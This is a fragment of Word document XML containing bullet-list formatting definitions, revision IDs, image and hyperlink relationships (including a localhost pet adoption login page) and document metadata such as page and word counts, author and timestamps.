    <w:lvl w:ilvl="5" w:tplc="E63C1A4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6DF26A8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D7AEA64E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="908495B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2DB5"/>
    <w:rsid w:val="00162DB5"/>
    <w:rsid w:val="003B2EC8"/>
    <w:rsid w:val="00534F07"/>
    <w:rsid w:val="00773B2E"/>
    <w:rsid w:val="00D36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86398"/>
  <w15:docId w15:val="{59D82152-883C-4210-9504-4F84FEF14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4F07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73B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6.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/pet_adoption/login.php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19</Pages>
  <Words>1688</Words>
  <Characters>9623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Prachurjo Sakib</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-12T11:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-12T11:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>